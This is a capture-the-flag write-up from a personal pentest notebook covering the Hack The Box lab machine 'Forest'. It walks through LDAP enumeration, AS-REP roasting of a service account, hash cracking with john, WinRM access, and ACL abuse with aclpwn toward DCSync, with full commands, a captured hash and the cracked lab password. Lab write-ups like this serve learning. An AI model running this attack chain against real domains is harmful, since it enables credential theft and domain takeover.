[email protected]
Search…
[email protected]
About Calvin Lai (fkclai)
My Work
Exploit/CVE PoC
ZeroLogon Exploit
Remote Retrieved Chrome saved Encrypted Password
Twitter Control an RCE attack
Hacking Report (HTB)
Hits & Summary
Windows Machine
Love 10.10.10.239
Blackfield 10.10.10.192
Remote 10.10.10.180
Sauna 10.10.10.175
Forest 10.10.10.161
Sniper
Json
Heist
Blue
Legacy
Resolute
Cascade
Linux Machine
PenTest & Exploitation Guide
01 Reconnaissance
02 Port Enumeration
03 Web Enumeration
04 Windows Enum & Exploit
05 File Enumeration
06 Reverse Shell Cheat Sheet
07 SQL Injection
08 BruteForce
09 XSS Bypass Checklist
10 Spring Boot
11 WPA
12 Payload list
Vuln Hub (Writeup)
MrRobot
CYBERRY
MATRIX 1
Node-1
DPwwn-1
DC7
AiWeb-2
AiWeb-1
BrainPan
CTF (Writeup)
Hacker One
CTF Learn
P.W.N. University - CTF 2018
HITCON
Useful Command/Tools
Windows
Linux
Offensive Security Lab & Exam
Lab
Powered By GitBook
Forest 10.10.10.161
Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. <John Lambert>
Owned at 03 Jan 2020

Background

Forest is an "Easy" difficulty Windows machine. It is a Windows Domain Controller (DC) and installed an Exchange server, it requires the DC enumeration technique and Kerberos knowledge.
Anonymous LDAP can be used to access the DC server and enumerate domain objects. A service account was found in which the Kerberos pre-authentication disabled, it can be cracked to gain the initial access. This service was a member of the "Account Operators" group, which can be used to create a privileged Exchange account.
Finally, this privileged account was leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.

Penetrating Methodology:

Service Scanning

    Nmap

Enumeration

    Kerberos
    SMB: smbclient, smbmap, enum4linux
    Ldap: ldapsearch
    NTLM: impacket/GetNPUsers

Exploitation

    Password Crack: John
    SMB connection: impacket/smbexec

Getting Less Privilege Shell

    Evil-winrm.rb
    Check vulnerability: sherlock.ps1
    secretsdump

Walkthrough:

Target machine: 10.10.10.161
Attacking (Hacker) machine: 10.10.14.18

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.161. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.
0.1) Quick Pre-searching
nmap 10.10.10.161, quick scan to get the opened port list
0.2) Details Analysis
nmap -p 22,80,443 -A -o nmap-forest.txt 10.10.10.161
Enumeration strategies
    1.
    LDAP - Port 389
    2.
    SMB - Port 135
    3.
    Kerberos - Port 88

Hacking Process Part 1 – Enumeration

enum4linux 10.10.10.161, get the basic information of the target machine

1.1) Strategy 1 Check port 389 LDAP Enumeration

    nmap -p 389 --script ldap-rootdse 10.10.10.161
    ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local"
Keep this information for later use
Domain: HTB with the following user
    HTB\sebastien
    HTB\lucinda
    HTB\svc-alfresco
    HTB\andy
    HTB\mark
    HTB\santi

1.2) Strategy 2 - Check SMB

Anonymous SMB login does not allow, SMB service does not available if no user credential
smbclient -I 10.10.10.161 -L andy
smbmap -R Replication -H 10.10.10.161

1.4) Strategy 3 Kerberos

Using the kerbrute to evaluate those user accounts found at above
../../../tools/win/kerbrute/kerbrute.py -domain htb.local -users ./user.list -passwords /usr/share/wordlists/rockyou.txt -outputfile forest_passwords.txt
It finds that the svc-alfresco account is “not preauth” account. Try to get the TGT using getNPUsers

Add the 10.10.10.161 to hosts file for the htb.local and try again
Cracking AS-REP Hashes with HashCat/John
[email protected]:3ce79e32b438b810950ea097f50ccedf$63b3f13f672cc9d483230b4c28ea26ff574bd9906b92cd5193d8496b2059ba20d009e50f7f3eed3d5440709e3b45b949ae456f27dd61b58c4e81a70e60c41adf75af3615acdd655455daa8023a9e931e91078e72db14241e8670375052ea5e13d817f328ffc19ca80873b736892fc1b65127d2f3f852eb11cb5749b46bad8fe49349352f9b5995f26f5cd24ea13d446710004a7cd86177206b638cff8f791a8df3a3c3a059c9087a99f18c9f5b21445a306d3695aed15377b3380b4c8b3e431bcf59afedabedf890d4457c38f193d750052f952e0ea746a16e6014615b4afe1fd4a4335fa14d
john --wordlist=/usr/share/wordlists/rockyou.txt alfresco.tgt
python ../../../tools/win/impacket-0.9.20/examples/getTGT.py htb.local/svc-alfresco:s3rvice
Get the password of svc-alfresco

Hacking Process Part 2 – Exploitation

2.1) Exploitation

The password of svc_alfresco is confirmed, but it cannot be accessed by SMB
../../../tools/win/impacket-0.9.20/examples/smbexec.py htb.local/svc-alfresco:[email protected] net user

Hacking Process Part 3 – Getting Low Privilege Access

3.1) WinRM
Test the WinRM (Windows Remote Management) service using the account
evil-winrm.rb
Get the low privilege access, check the flag

Check the svc-alfresco is not the local administrators group
3.1) Enumeration
No Vulnerability found
sherlock.ps1
Cannot get the ntlm hash using the account using secretsdump
4.1) Sherlock to find the vulnerability of the system
Objective: from SVC-aldresco to HTB.local
aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -dry -s 10.10.10.161 -u svc-alfresco -p s3rvice
aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -s 10.10.10.161 -u svc-alfresco -p s3rvice

Conclusion...

Reference Link

What is kerberos and how to attack it.
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/
https://securityonline.info/aclpwn/
Previous
Sauna 10.10.10.175
Next
Sniper
Last modified 9mo ago
Copy link
Contents
Background
Penetrating Methodology:
Service Scanning
Enumeration
Exploitation
Getting Less Privilege Shell
Walkthrough:
Hacking Process Part 0 – Service Scanning
Hacking Process Part 1 – Enumeration
1.1) Strategy 1 Check port 389 LDAP Enumeration
1.2) Strategy 2 - Check SMB
1.4) Strategy 3 Kerberos
Hacking Process Part 2 – Exploitation
2.1) Exploitation
Hacking Process Part 3 – Getting Low Privilege Access
Conclusion...
Reference Link